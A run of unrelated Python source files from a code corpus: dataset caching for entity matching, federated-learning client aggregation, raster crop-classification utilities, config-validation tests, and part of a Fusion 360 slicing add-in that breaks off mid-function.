for field, name in six.iteritems(reverse_fields):
if field is not None and hasattr(field, "vocab"):
vocabs[name] = field.vocab
for name, field in six.iteritems(fields):
field_args[name] = None
if field is not None:
field_args[name] = field.preprocess_args()
data = {
"examples": examples,
"train_metadata": train_metadata,
"vocabs": vocabs,
"datafiles": datafiles,
"datafiles_modified": datafiles_modified,
"field_args": field_args,
"state_args": state_args,
"column_naming": column_naming,
}
torch.save(data, cachefile)
@staticmethod
def load_cache(fields, datafiles, cachefile, column_naming, state_args):
r"""Load datasets and corresponding metadata from cache.
This method also checks whether any of the data loading arguments have changes
that make the cache contents invalid. The following kinds of changes are currently
detected automatically:
* Data filename changes (e.g. different train filename)
* Data file modifications (e.g. train data modified)
* Column changes (e.g. using a different subset of columns in CSV file)
* Column specification changes (e.g. changing lowercasing behavior)
* Column naming convention changes (e.g. different labeled data column)
Arguments:
fields (dict): Mapping from attribute names (e.g. "left_address") to
corresponding :class:`~data.MatchingField` objects that specify how to
process the field.
datafiles (list): A list of the data files.
cachefile (str): The cache file path.
column_naming (dict): A `dict` containing column naming conventions. See
`__init__` for details.
state_args (dict): A `dict` containing other information about the state under
which the cache was created.
Returns:
Tuple containing unprocessed cache data dict and a list of cache staleness
causes, if any.
.. warning::
Note that if a column specification, i.e., arguments to
:class:`~data.MatchingField` include callable arguments (e.g. lambdas or
functions) these arguments cannot be serialized and hence will not be checked
for modifications.
"""
cached_data = torch.load(cachefile)
cache_stale_cause = set()
if datafiles != cached_data["datafiles"]:
cache_stale_cause.add("Data file list has changed.")
datafiles_modified = [os.path.getmtime(datafile) for datafile in datafiles]
if datafiles_modified != cached_data["datafiles_modified"]:
cache_stale_cause.add("One or more data files have been modified.")
if set(fields.keys()) != set(cached_data["field_args"].keys()):
cache_stale_cause.add("Fields have changed.")
for name, field in six.iteritems(fields):
none_mismatch = (field is None) != (cached_data["field_args"][name] is None)
args_mismatch = False
if field is not None and cached_data["field_args"][name] is not None:
args_mismatch = (
field.preprocess_args() != cached_data["field_args"][name]
)
if none_mismatch or args_mismatch:
cache_stale_cause.add("Field arguments have changed.")
if field is not None and not isinstance(field, MatchingField):
cache_stale_cause.add("Cache update required.")
if column_naming != cached_data["column_naming"]:
cache_stale_cause.add("Other arguments have changed.")
cache_stale_cause.update(
MatchingDataset.state_args_compatibility(
state_args, cached_data["state_args"]
)
)
return cached_data, cache_stale_cause
@staticmethod
def state_args_compatibility(cur_state, old_state):
errors = []
if not old_state["train_pca"] and cur_state["train_pca"]:
errors.append("PCA computation necessary.")
return errors
@staticmethod
def restore_data(fields, cached_data):
r"""Recreate datasets and related data from cache.
This restores all datasets, metadata and attribute information (including the
vocabulary and word embeddings for all tokens in each attribute).
"""
datasets = []
for d in range(len(cached_data["datafiles"])):
metadata = None
if d == 0:
metadata = cached_data["train_metadata"]
dataset = MatchingDataset(
path=cached_data["datafiles"][d],
fields=fields,
examples=cached_data["examples"][d],
metadata=metadata,
column_naming=cached_data["column_naming"],
)
datasets.append(dataset)
for name, field in fields:
if name in cached_data["vocabs"]:
field.vocab = cached_data["vocabs"][name]
return datasets
@classmethod
def splits(
cls,
path,
train=None,
validation=None,
test=None,
fields=None,
embeddings=None,
embeddings_cache=None,
column_naming=None,
cache=None,
check_cached_data=True,
auto_rebuild_cache=False,
train_pca=False,
**kwargs
):
"""Create Dataset objects for multiple splits of a dataset.
Args:
path (str): Common prefix of the splits' file paths.
train (str): Suffix to add to path for the train set.
validation (str): Suffix to add to path for the validation set, or None
for no validation set. Default is None.
test (str): Suffix to add to path for the test set, or None for no test
set. Default is None.
fields (list(tuple(str, MatchingField))): A list of tuples containing column
name (e.g. "left_address") and corresponding :class:`~data.MatchingField`
pairs, in the same order that the columns occur in the CSV file. Tuples of
(name, None) represent columns that will be ignored.
embeddings (str or list): Same as `embeddings` parameter of
:func:`~data.process`.
embeddings_cache (str): Directory to store dowloaded word vector data.
column_naming (dict): Same as `column_naming` paramter of `__init__`.
cache (str): Suffix to add to path for cache file. If `None` disables caching.
check_cached_data (bool): Verify that data files haven't changes since the
cache was constructed and that relevant field options haven't changed.
auto_rebuild_cache (bool): Automatically rebuild the cache if the data files
are modified or if the field options change. Defaults to False.
train_pca (bool): Whether to compute PCA for each attribute as part of
dataset metadata compuatation. Defaults to False.
filter_pred (callable or None): Use only examples for which
filter_pred(example) is True, or use all examples if None.
Default is None. This is a keyword-only parameter.
Returns:
Tuple[MatchingDataset]: Datasets for (train, validation, and test) splits in
that order, if provided.
"""
fields_dict = dict(fields)
state_args = {"train_pca": train_pca}
datasets = None
if cache:
datafiles = [f for f in (train, validation, test) if f is not None]
datafiles = [os.path.expanduser(os.path.join(path, d)) for d in datafiles]
cachefile = os.path.expanduser(os.path.join(path, cache))
try:
cached_data, cache_stale_cause = MatchingDataset.load_cache(
fields_dict, datafiles, cachefile, column_naming, state_args
)
if check_cached_data and cache_stale_cause:
if not auto_rebuild_cache:
raise MatchingDataset.CacheStaleException(cache_stale_cause)
else:
logger.warning(
"Rebuilding data cache because: %s", list(cache_stale_cause)
)
if not check_cached_data or not cache_stale_cause:
datasets = MatchingDataset.restore_data(fields, cached_data)
except IOError:
pass
if not datasets:
begin = timer()
dataset_args = {"fields": fields, "column_naming": column_naming, **kwargs}
train_data = (
None
if train is None
else cls(path=os.path.join(path, train), **dataset_args)
)
val_data = (
None
if validation is None
else cls(path=os.path.join(path, validation), **dataset_args)
)
test_data = (
None
if test is None
else cls(path=os.path.join(path, test), **dataset_args)
)
datasets = tuple(
d for d in (train_data, val_data, test_data) if d is not None
)
after_load = timer()
logger.info("Data load took: {}s".format(after_load - begin))
fields_set = set(fields_dict.values())
for field in fields_set:
if field is not None and field.use_vocab:
field.build_vocab(
*datasets, vectors=embeddings, cache=embeddings_cache
)
after_vocab = timer()
logger.info("Vocab construction time: {}s".format(after_vocab - after_load))
if train:
datasets[0].compute_metadata(train_pca)
after_metadata = timer()
logger.info(
"Metadata computation time: {}s".format(after_metadata - after_vocab)
)
if cache:
MatchingDataset.save_cache(
datasets,
fields_dict,
datafiles,
cachefile,
column_naming,
state_args,
)
after_cache = timer()
logger.info("Cache save time: {}s".format(after_cache - after_vocab))
if train:
datasets[0].finalize_metadata()
# Save additional information to train dataset.
datasets[0].embeddings = embeddings
datasets[0].embeddings_cache = embeddings_cache
datasets[0].train_pca = train_pca
# Set vocabs.
for dataset in datasets:
dataset.vocabs = {
name: datasets[0].fields[name].vocab
for name in datasets[0].all_text_fields
}
if len(datasets) == 1:
return datasets[0]
return tuple(datasets)
def interleave_keys(keys):
r"""Interleave bits from two sort keys to form a joint sort key.
Examples that are similar in both of the provided keys will have similar
values for the key defined by this function. Useful for tasks with two
text fields like machine translation or natural language inference.
"""
def interleave(args):
return "".join([x for t in zip(*args) for x in t])
return int("".join(interleave(format(x, "016b") for x in keys)), base=2)
| StarcoderdataPython |
1681325 | import copy
from cv2 import log
import numpy as np
import torch
from utils.Fed import FedAvg,FedAvgGradient, FedAvgP
from core.mm_fmnist.SGDClient_fm import SGDClient
from core.mm_fmnist.SVRGClient_fm import SVRGClient
from core.mm_fmnist.Client_fm import Client
from core.ClientManage import ClientManage
class ClientManageMM(ClientManage):
def __init__(self,args, net_glob, client_idx, dataset, dict_users, hyper_param) -> None:
super().__init__(args, net_glob, client_idx, dataset, dict_users, hyper_param)
self.client_idx=client_idx
self.args=args
self.dataset=dataset
self.dict_users=dict_users
self.hyper_param = copy.deepcopy(hyper_param)
def fed_in(self):
#print(self.client_idx)
w_glob = self.net_glob.state_dict()
if self.args.all_clients:
print("Aggregation over all clients")
w_locals = [w_glob for i in range(self.args.num_users)]
else:
w_locals=[]
loss_locals = []
grad_locals = []
client_locals = []
temp_net=copy.deepcopy(self.net_glob)
for name, w in temp_net.named_parameters():
if "outer" in name:
w.requires_grad= False
for idx in self.client_idx:
if self.args.optim == 'sgd':
client = SGDClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
elif self.args.optim == 'svrg':
client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
grad = client.batch_grad()
grad_locals.append(grad)
else:
raise NotImplementedError
client_locals.append(client)
if self.args.optim == 'svrg':
avg_grad = FedAvgGradient(grad_locals)
#print(avg_grad)
for client in client_locals:
client.set_avg_q(avg_grad)
for client in client_locals:
w, loss = client.train_epoch()
if self.args.all_clients:
w_locals[idx] = copy.deepcopy(w)
else:
w_locals.append(copy.deepcopy(w))
loss_locals.append(copy.deepcopy(loss))
# update global weights
w_glob = FedAvg(w_locals)
# copy weight to net_glob
self.net_glob.load_state_dict(w_glob)
loss_avg = sum(loss_locals) / len(loss_locals)
return w_glob, loss_avg
def lfed_out(self,client_locals):
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
hg_client = client.hyper_grad(None)
hg = client.hyper_update(hg_client)
hg_locals.append(hg)
hg_glob=FedAvgP(hg_locals, self.args)
return hg_glob, 1
def fed_out(self):
client_locals=[]
for idx in self.client_idx:
client= Client(self.args, idx, copy.deepcopy(self.net_glob),self.dataset, self.dict_users, self.hyper_param)
client_locals.append(client)
if self.args.hvp_method == 'seperate':
return self.lfed_out(client_locals)
comm_round = 0
hg_locals =[]
for client in client_locals:
hg= client.hyper_grad(None)
hg_locals.append(hg)
hg_glob=FedAvgP(hg_locals, self.args)
#print("hg_glob",hg_glob)
comm_round+=1
#print(hg_glob)
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
h = client.hyper_svrg_update(hg_glob)
hg_locals.append(h)
hg_glob=FedAvgP(hg_locals, self.args)
comm_round+=1
return hg_glob, comm_round
def fed_joint(self):
#print(self.client_idx)
w_glob = self.net_glob.state_dict()
if self.args.all_clients:
print("Aggregation over all clients")
w_locals = [w_glob for i in range(self.args.num_users)]
else:
w_locals=[]
loss_locals = []
grad_locals = []
client_locals = []
temp_net=copy.deepcopy(self.net_glob)
for idx in self.client_idx:
if self.args.optim == 'sgd':
client = SGDClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
elif self.args.optim == 'svrg':
client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
grad = client.batch_grad()
grad_locals.append(grad)
else:
raise NotImplementedError
client_locals.append(client)
if self.args.optim == 'svrg':
avg_grad = FedAvgGradient(grad_locals)
for client in client_locals:
client.set_avg_q(avg_grad)
for client in client_locals:
w, loss = client.train_epoch()
if self.args.all_clients:
w_locals[idx] = copy.deepcopy(w)
else:
w_locals.append(copy.deepcopy(w))
loss_locals.append(copy.deepcopy(loss))
# update global weights
hg_glob, comm_round = self.lfed_out(client_locals)
w_glob = FedAvg(w_locals)
# copy weight to net_glob
self.net_glob.load_state_dict(w_glob)
loss_avg = sum(loss_locals) / len(loss_locals)
return w_glob, loss_avg, hg_glob, comm_round
| StarcoderdataPython |
51573 | <filename>crop_type_mapping/ml_crop_cli/ml_crop/utils_data.py
import geopandas as gpd
import numpy as np
import rasterio
from rasterio.features import rasterize
from rasterstats.io import bounds_window
from sklearn.model_selection import train_test_split
def crop_classes(train_geo):
training_vectors = gpd.read_file(train_geo)
classes = np.unique(training_vectors.name)
class_dict = dict(zip(classes, range(len(classes))))
return class_dict
def all_values(x):
return x
def train_raw(raster_file, train_geo):
training_vectors = gpd.read_file(train_geo)
class_dict = crop_classes(train_geo)
print(class_dict)
# set up our training data lists
# this larger cell reads data from a raster file for each training vector
x_raw = []
y_raw = []
with rasterio.open(raster_file, 'r') as src:
for (label, geom) in zip(
training_vectors.name,
training_vectors.geometry):
# read the raster data matching the geometry bounds
window = bounds_window(geom.bounds, src.transform)
# store our window information
window_affine = src.window_transform(window)
fsrc = src.read(window=window)
# rasterize the geometry into the larger shape and affine
mask = rasterize(
[(geom, 1)],
out_shape=fsrc.shape[1:],
transform=window_affine,
fill=0,
dtype='uint8',
all_touched=True
).astype(bool)
# for each label pixel (places where the mask is true)...
label_pixels = np.argwhere(mask)
for (row, col) in label_pixels:
# add a pixel of data to X
data = fsrc[:, row, col]
one_x = np.nan_to_num(data, nan=1e-3)
x_raw.append(one_x)
y_raw.append(class_dict[label])
return x_raw, y_raw
def norm_inds(arr, a, b):
inds = np.expand_dims((arr[..., a] - arr[..., b]) /
(arr[..., a] + arr[..., b]), axis=1)
return inds
def train_split(X_raw, Y_raw):
X = np.array(X_raw)
y = np.array(Y_raw)
print("training data shape is")
print(X.shape, y.shape)
ndvi = norm_inds(X, 3, 2)
ndwi = norm_inds(X, 1, 3)
X = np.concatenate([X, ndvi, ndwi], axis=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
labels, counts = np.unique(y_train, return_counts=True)
class_weight_dict = dict(zip(labels, 1/counts))
return X_train, X_test, y_train, y_test, class_weight_dict, labels
| StarcoderdataPython |
3222799 | <reponame>luxbe/sledo
from typing import Dict
import pytest
from schema import SchemaError
import yaml
from sledo.generate.config import validateConfig
base_config: Dict = {}
with open("tests/resources/config.yaml") as f:
base_config = yaml.load(f, Loader=yaml.BaseLoader)
def test_validation_no_keys():
with pytest.raises(SchemaError) as ctx:
validateConfig({})
assert "Missing key: 'schemas'" in str(
ctx.value), "Expected the key 'schemas' to be required"
def test_validation_initial():
config = dict(base_config)
config["initial"] = "invalid"
with pytest.raises(SchemaError) as ctx:
validateConfig(config)
assert "Missing step: 'invalid'" in str(ctx.value)
def test_validation_steps_generate():
config = dict(base_config)
config["steps"]["create_order"]["generate"] = "invalid"
with pytest.raises(SchemaError) as ctx:
validateConfig(config)
assert "Missing schema: 'invalid'" in str(ctx.value)
def test_validation_steps_generate_probability():
config = dict(base_config)
config["steps"]["create_order"]["generate"] = {
"Invoice": 0.7,
"Order": 0.6
}
with pytest.raises(SchemaError) as ctx:
validateConfig(config)
assert "The total probability must not be more than 1 at step: 'create_order'" in str(
ctx.value)
| StarcoderdataPython |
1670600 | import adsk
import adsk.core
import adsk.fusion
import traceback
from collections import defaultdict, namedtuple
from typing import List
from .Fusion360Utilities.Fusion360Utilities import get_app_objects
from .Fusion360Utilities.Fusion360CommandBase import Fusion360CommandBase
from .Fusion360Utilities import Fusion360Utilities as futil
Post = namedtuple('Post', ('top_point', 'bottom_point', 'line', 'length'))
Post_Point = namedtuple('Post_Point', ('point', 'body', 'sketch_face', 'line', 'length'))
SliceFace = namedtuple('SliceFace', ('face', 'body'))
SliceComponent = namedtuple('SliceComponent', ('occurrence', 'end_face'))
# Should move to utilities
def add_construction_sketch(sketches, plane):
sketch = sketches.add(plane)
for curve in sketch.sketchCurves:
curve.isConstruction = True
return sketch
SLICERDEF = None
# TODO Master list
# Identify which module each piece is in after dove tails.
# Show identification? Sketch on the model once its flat.
# For Dove Tails model flush "body split"
# Create slice in a given direction
def create_slices2(target_body, spacing, qty, base_plane, slice_thickness, name):
target_comp = target_body.parentComponent
# Feature Collections
planes = target_comp.constructionPlanes
component_slices = []
face_slices = []
for i in range(1, qty + 1):
offset_value = adsk.core.ValueInput.createByReal(i * spacing)
# Create construction plane input
plane_input = planes.createInput()
# Add construction plane by offset
plane_input.setByOffset(base_plane, offset_value)
plane = planes.add(plane_input)
plane.name = name + '-' + str(i)
slice_name = name + '-' + str(i)
create_slice(plane, slice_thickness, target_body, face_slices, component_slices, slice_name)
return component_slices, face_slices
def create_slice(plane: adsk.fusion.ConstructionPlane, slice_thickness: float, target_body: adsk.fusion.BRepBody,
face_slices, component_slices, slice_name):
ao = get_app_objects()
design = ao['design']
target_comp = target_body.parentComponent
new_occurrence = target_comp.occurrences.addNewComponent(adsk.core.Matrix3D.create())
new_occurrence.activate()
new_occurrence.component.name = slice_name
# Feature Collections
sketches = new_occurrence.component.sketches
patches = new_occurrence.component.features.patchFeatures
extrude_features = new_occurrence.component.features.extrudeFeatures
# Create the sketch
# todo fix plane creation
mid_plane = plane
mid_sketch = add_construction_sketch(sketches, mid_plane)
mid_sketch.projectCutEdges(target_body)
mid_sketch.name = 'Mid_Sketch'
plus_plane = create_offset_plane(new_occurrence.component, slice_thickness / 2, plane)
plus_plane.name = 'Plus_Plane'
plus_sketch = add_construction_sketch(sketches, plus_plane)
plus_sketch.projectCutEdges(target_body)
plus_sketch.name = 'Plus_Sketch'
minus_plane = create_offset_plane(new_occurrence.component, -slice_thickness / 2, plane)
minus_plane.name = 'Minus_Plane'
minus_sketch = add_construction_sketch(sketches, minus_plane)
minus_sketch.projectCutEdges(target_body)
minus_sketch.name = 'Minus_Sketch'
mid_slices = []
get_contained_profiles(mid_sketch, patches, target_body, True, mid_slices)
plus_profiles = get_contained_profiles(plus_sketch, patches, target_body)
minus_profiles = get_contained_profiles(minus_sketch, patches, target_body)
thickness_value = adsk.core.ValueInput.createByReal(slice_thickness)
negative_thickness_value = adsk.core.ValueInput.createByReal(-slice_thickness)
if plus_profiles.count == 0:
new_occurrence.component.name += '----FIX__ME'
plus_sketch.name += '----FIX__ME'
return
plus_extrude = extrude_features.addSimple(plus_profiles, negative_thickness_value,
adsk.fusion.FeatureOperations.NewBodyFeatureOperation)
plus_bodies = []
for body in plus_extrude.bodies:
plus_bodies.append(body)
create_face_slices(plus_extrude.endFaces, mid_slices, face_slices)
# end_face = plus_extrude.endFaces[0]
if minus_profiles.count == 0:
new_occurrence.component.name += '----FIX__ME'
minus_sketch.name += '----FIX__ME'
return
minus_extrude = extrude_features.addSimple(minus_profiles, thickness_value,
adsk.fusion.FeatureOperations.IntersectFeatureOperation)
# Get the current position of the timeline.
start_position = design.timeline.markerPosition
minus_extrude.timelineObject.rollTo(True)
minus_extrude.participantBodies = plus_bodies
design.timeline.markerPosition = start_position
design.activateRootComponent()
# slice_face = SliceFace()
# slice_component = SliceComponent(new_occurrence, end_face)
# moved_body = face.body.moveToComponent(new_occurrence)
# moved_face = moved_body.faces.item(0)
# SliceFace = namedtuple('SliceFace', ('face', 'body'))
# SliceComponent = namedtuple('SliceComponent', ('occurrence', 'end_face'))
# Todo build slices from list
# Todo Build Slice components
# Todo fix references
# return SliceComponent(new_occurrence, end_face)
# if not end_face.isValid:
# end_face = minus_extrude.endFaces[0]
end_face = mid_slices[-1]
component_slices.append(SliceComponent(new_occurrence, end_face))
def create_face_slices(extrude_faces, mid_faces, face_slices):
extrude_bodies = []
mid_bodies = []
for e_face in extrude_faces:
extrude_dict = {'body': e_face.body, 'area': e_face.evaluator.area, 'face': e_face}
extrude_bodies.append(extrude_dict)
for m_face in mid_faces:
extrude_dict = {'body': m_face.body, 'area': m_face.evaluator.area, 'face': m_face}
mid_bodies.append(extrude_dict)
extrude_bodies = sorted(extrude_bodies, key=lambda k: k["area"])
mid_bodies = sorted(mid_bodies, key=lambda k: k["area"])
for i, mid_body in enumerate(mid_bodies):
new_slice = SliceFace(mid_bodies[i]['face'], extrude_bodies[i]['body'])
face_slices.append(new_slice)
def get_contained_profiles(sketch, patches, target_body, is_mid_plane=False, mid_slices=None):
extrude_profiles = adsk.core.ObjectCollection.create()
# Account for potential of multiple resulting faces in the slice
for profile in sketch.profiles:
# Create the patch feature
patch_input = patches.createInput(profile, adsk.fusion.FeatureOperations.NewBodyFeatureOperation)
patch_feature = patches.add(patch_input)
# Possibly patch could create multiple faces, although unlikely in this application
# for patch_face in patch_feature.faces:
patch_face = patch_feature.faces[0]
# Check if surface is actually in solid
point = patch_face.pointOnFace
containment = target_body.pointContainment(point)
if containment == adsk.fusion.PointContainment.PointInsidePointContainment:
extrude_profiles.add(profile)
if is_mid_plane:
mid_slices.append(patch_face)
else:
patch_feature.deleteMe()
else:
patch_feature.deleteMe()
return extrude_profiles
def project_all_entities(sketch, entities):
for entity in entities:
sketch.project(entity)
# Create vertical lines at intersections of two face sets
# Post_Point = namedtuple('Post_Point', ('point', 'body', 'sketch_face', 'line', 'length'))
def make_posts(target_slices: List[SliceFace], intersect_slices: List[SliceFace]):
top_points = []
bottom_points = []
for i, target_slice in enumerate(target_slices):
sketches = target_slice.face.body.parentComponent.sketches
post_sketch = add_construction_sketch(sketches, target_slice.face)
for intersect_slice in intersect_slices:
post_sketch.projectCutEdges(intersect_slice.face.body)
lines = post_sketch.sketchCurves.sketchLines
for line in lines:
if not line.isConstruction:
length = line.length
start_point = line.startSketchPoint.worldGeometry
end_point = line.endSketchPoint.worldGeometry
if start_point.z > end_point.z:
top_points.append(Post_Point(start_point, target_slice.body, target_slice.face, line, length))
bottom_points.append(Post_Point(end_point, target_slice.body, target_slice.face, line, length))
else:
top_points.append(Post_Point(end_point, target_slice.body, target_slice.face, line, length))
bottom_points.append(
Post_Point(start_point, target_slice.body, target_slice.face, line, length))
post_sketch.name = 'Intersection Sketch-' + str(i)
post_sketch.isVisible = False
return top_points, bottom_points
def make_slots(target_body: adsk.fusion.BRepBody, post_points: List[Post_Point], thickness: float,
direction: adsk.core.Vector3D):
root_comp = target_body.parentComponent
# Get extrude features
# extrudes = root_comp.features.extrudeFeatures
# Create sketch
# sketches = root_comp.sketches
for i, post_point in enumerate(post_points):
sketches = post_point.body.parentComponent.sketches
extrudes = post_point.body.parentComponent.features.extrudeFeatures
slot_sketch = add_construction_sketch(sketches, post_point.sketch_face)
sketch_lines = slot_sketch.sketchCurves.sketchLines
center_point = slot_sketch.modelToSketchSpace(post_point.point)
center_point.z = 0
x_vector = direction.copy()
x_vector.scaleBy(thickness / 2)
y_vector = adsk.core.Vector3D.create(0, 0, 1)
y_vector.scaleBy(post_point.length / 2)
# trans_vector = adsk.core.Vector3D.create(post_point.length / 2, thickness / 2, 0)
corner_point = post_point.point.copy()
corner_point.translateBy(x_vector)
corner_point.translateBy(y_vector)
corner_point_sketch = slot_sketch.modelToSketchSpace(corner_point)
corner_point_sketch.z = 0
# corner_point.translateBy(adsk.core.Vector3D.create(post_point.length/2, thickness/2, 0))
# corner_point_sketch = sketch_points.add(corner_point)
rectangle_list = sketch_lines.addCenterPointRectangle(center_point, corner_point_sketch)
# Get the profile defined by the rectangle
prof = slot_sketch.profiles.item(0)
thickness_value = adsk.core.ValueInput.createByReal(thickness)
is_full_length = True
extrude_input = extrudes.createInput(prof, adsk.fusion.FeatureOperations.CutFeatureOperation)
extrude_input.setSymmetricExtent(thickness_value, is_full_length)
# ao = get_app_objects()
# ao['ui'].messageBox(post_point.body.objectType)
extrude_input.participantBodies = [post_point.body]
# Create the extrusion
extrude = extrudes.add(extrude_input)
slot_sketch.name = 'slot_sketch-' + str(i)
slot_sketch.isVisible = False
# Make slots from template body
def make_custom_slots(target_body, points, template_bodies):
target_component = target_body.parentComponent
move_feats = target_component.features.moveFeatures
for point in points:
translation_vector = adsk.core.Vector3D.create(point[0].x, point[0].y, point[0].z)
if translation_vector.length > 0:
new_collection = adsk.core.ObjectCollection.create()
tool_bodies = []
for body in template_bodies:
new_body = body.copyToComponent(target_component)
new_collection.add(new_body)
tool_bodies.append(new_body)
transform_matrix = adsk.core.Matrix3D.create()
transform_matrix.translation = translation_vector
move_input = move_feats.createInput(new_collection, transform_matrix)
move_feats.add(move_input)
futil.combine_feature(point[1], tool_bodies, adsk.fusion.FeatureOperations.CutFeatureOperation)
# Create components from all bodies
# Should add to utilities
def components_from_bodies(slice_results: List[SliceFace]):
component_results = []
for slice_result in slice_results:
original_body = slice_result.new_body
# copied_body = original_body.copyToComponent(original_body.parentComponent)
output_body = original_body.createComponent()
# TODO move mid face to component
component_result = {
'output_body': output_body,
'output_component': output_body.parentComponent,
# 'copied_body': copied_body,
'mid_face': slice_result.face,
'end_face': slice_result.end_face
}
component_results.append(component_result)
return component_results
# Returns a normalized vector in positive XYZ space from a given edge
def get_positive_unit_vector_from_edge(edge):
# Set up a vector based on input edge
(returnValue, startPoint, endPoint) = edge.geometry.evaluator.getEndPoints()
direction_vector = adsk.core.Vector3D.create(endPoint.x - startPoint.x,
endPoint.y - startPoint.y,
endPoint.z - startPoint.z)
direction_vector.normalize()
if direction_vector.x < 0:
direction_vector.x *= -1
if direction_vector.y < 0:
direction_vector.y *= -1
if direction_vector.z < 0:
direction_vector.z *= -1
return direction_vector
# Returns the magnatude of the bounding box in the specified direction
def get_bounding_box_extent_in_direction(component, direction_vector):
max_point = component.boundingBox.maxPoint
min_point = component.boundingBox.minPoint
delta_vector = adsk.core.Vector3D.create(max_point.x - min_point.x,
max_point.y - min_point.y,
max_point.z - min_point.z)
delta = delta_vector.dotProduct(direction_vector)
return delta
# Transforms an occurance along a specified vector by a specified amount
def transform_along_vector(occurrence, directionVector, magnatude):
# Create a vector for the translation
vector = directionVector.copy()
vector.scaleBy(magnatude)
# Create a transform to do move
transform = adsk.core.Matrix3D.cast(occurrence.transform)
new_transform = adsk.core.Matrix3D.create()
new_transform.translation = vector
transform.transformBy(new_transform)
# Transform Component
occurrence.transform = transform
# Arranges components on a plane with a given spacing
def arrange_components(component_slices: List[SliceComponent], plane, spacing, direction_vector):
# app = adsk.core.Application.get()
# ui = app.userInterface
# product = app.activeProduct
# design = adsk.fusion.Design.cast(product)
# Get Placement Direction from Edge
# direction_vector = get_positive_unit_vector_from_edge(edge)
# Get extents of stock in placement direction
delta_plane = get_bounding_box_extent_in_direction(plane, direction_vector)
# Set initial magnitude
magnitude = 0.0
magnitude -= delta_plane / 2
# Iterate and place components
for slice_component in component_slices:
# Get extents of current component in placement direction
delta = get_bounding_box_extent_in_direction(slice_component.occurrence, direction_vector)
# ui.messageBox(str(delta))
# Increment magnitude
magnitude += spacing
magnitude += delta / 2
# Move component in specified direction by half its width
transform_along_vector(slice_component.occurrence, direction_vector, magnitude)
# Increment spacing value for next component
magnitude += delta / 2
class StockSheet:
def __init__(self, target_body: adsk.fusion.BRepBody, thickness):
target_comp = get_app_objects()['root_comp']
new_occurrence = target_comp.occurrences.addNewComponent(adsk.core.Matrix3D.create())
new_occurrence.activate()
# Feature Collections
sketches = new_occurrence.component.sketches
extrude_features = new_occurrence.component.features.extrudeFeatures
sketch = sketches.add(new_occurrence.component.xYConstructionPlane)
sketch.sketchCurves.sketchLines.addTwoPointRectangle(sketch.originPoint.geometry,
adsk.core.Point3D.create(100, 100, 0))
# Get the profile defined by the rectangle
profile = sketch.profiles.item(0)
thickness_value = adsk.core.ValueInput.createByReal(thickness)
# Create the extrusion
extrude = extrude_features.addSimple(profile, thickness_value,
adsk.fusion.FeatureOperations.NewBodyFeatureOperation)
self.body = extrude.bodies[0]
self.new_component = extrude.parentComponent
self.occurrence = new_occurrence
self.end_face = extrude.endFaces[0]
# self.end_face = extrude.endFaces[0].createForAssemblyContext(self.occurrence)
# adsk.fusion.Occurrence.cast(target_body).isGrounded = True
get_app_objects()['design'].activateRootComponent()
new_occurrence.isGrounded = True
new_occurrence.isLightBulbOn = False
def create_offset_plane(target_comp, distance, base_plane):
planes = target_comp.constructionPlanes
# Add construction plane by offset
plane_input = planes.createInput()
offset_value = adsk.core.ValueInput.createByReal(distance)
plane_input.setByOffset(base_plane, offset_value)
return planes.add(plane_input)
class SlicerDef:
def __init__(self, target_body=None, num_x=None, num_y=None, thickness=None, lay_this_flat=None):
if target_body is not None:
bounding_box = target_body.boundingBox
target_comp = target_body.parentComponent
self.target_body = target_body
self.target_body = target_body
self.x_plane = create_offset_plane(target_comp, bounding_box.minPoint.x, target_comp.yZConstructionPlane)
self.x_plane.name = 'X_Zero_Plane'
self.x_plane.isLightBulbOn = False
self.y_plane = create_offset_plane(target_comp, bounding_box.minPoint.y, target_comp.xZConstructionPlane)
self.y_plane.name = 'Y_Zero_Plane'
self.y_plane.isLightBulbOn = False
self.x_spacing = (bounding_box.maxPoint.x - bounding_box.minPoint.x) / (num_x + 1)
self.y_spacing = (bounding_box.maxPoint.y - bounding_box.minPoint.y) / (num_y + 1)
self.x_component_slices = []
self.y_component_slices = []
self.thickness = thickness
if lay_this_flat:
self.stock_sheet = StockSheet(target_body, thickness)
else:
self.stock_sheet = None
def lay_flat(component_slices: List[SliceComponent], stock_sheet: StockSheet):
# Get the root component of the active design
app = adsk.core.Application.get()
product = app.activeProduct
design = adsk.fusion.Design.cast(product)
root_comp = design.rootComponent
key_type = adsk.fusion.JointKeyPointTypes.CenterKeyPoint
# Apply Joints
for slice_component in component_slices:
face1 = slice_component.end_face
face2 = stock_sheet.end_face
# ui = app.userInterface
# ui.messageBox(face1.objectType)
# ui.messageBox(face1.body.parentComponent.name)
# ui.messageBox(face2.objectType)
# ui.messageBox(face2.body.parentComponent.name)
# Create the joint geometry
geo0 = adsk.fusion.JointGeometry.createByPlanarFace(face1, None, key_type)
geo1 = adsk.fusion.JointGeometry.createByPlanarFace(face2, None, key_type)
# Create joint input
joints = root_comp.joints
joint_input = joints.createInput(geo0, geo1)
joint_input.setAsPlanarJointMotion(adsk.fusion.JointDirections.ZAxisJointDirection)
# Create the joint
joint = joints.add(joint_input)
# joint.deleteMe()
# Lite version of Fusion 360 Slicer
class FusionSlicerLTCommand(Fusion360CommandBase):
# Run whenever a user makes any change to a value or selection in the addin UI
# Commands in here will be run through the Fusion processor and changes will be reflected in Fusion graphics area
def on_preview(self, command, inputs, args, input_values):
pass
# Run when any input is changed.
# Can be used to check a value and then update the add-in UI accordingly
def on_input_changed(self, command_, command_inputs, changed_input, input_values):
pass
# Run when the user presses OK
# This is typically where your main program logic would go
def on_execute(self, command, inputs, args, input_values):
global SLICERDEF
# Get a reference to all relevant application objects in a dictionary
app_objects = get_app_objects()
ui = app_objects['ui']
# Get the target body
target_body = input_values['target_input'][0]
# Start Feature group
start_index = futil.start_group()
SLICERDEF = SlicerDef(target_body, input_values['x_qty'], input_values['y_qty'],
input_values['slice_thickness'], input_values['lay_flat'])
# Make X Slices
x_component_slices, x_face_slices = create_slices2(target_body, SLICERDEF.x_spacing, input_values['x_qty'],
SLICERDEF.x_plane, input_values['slice_thickness'],
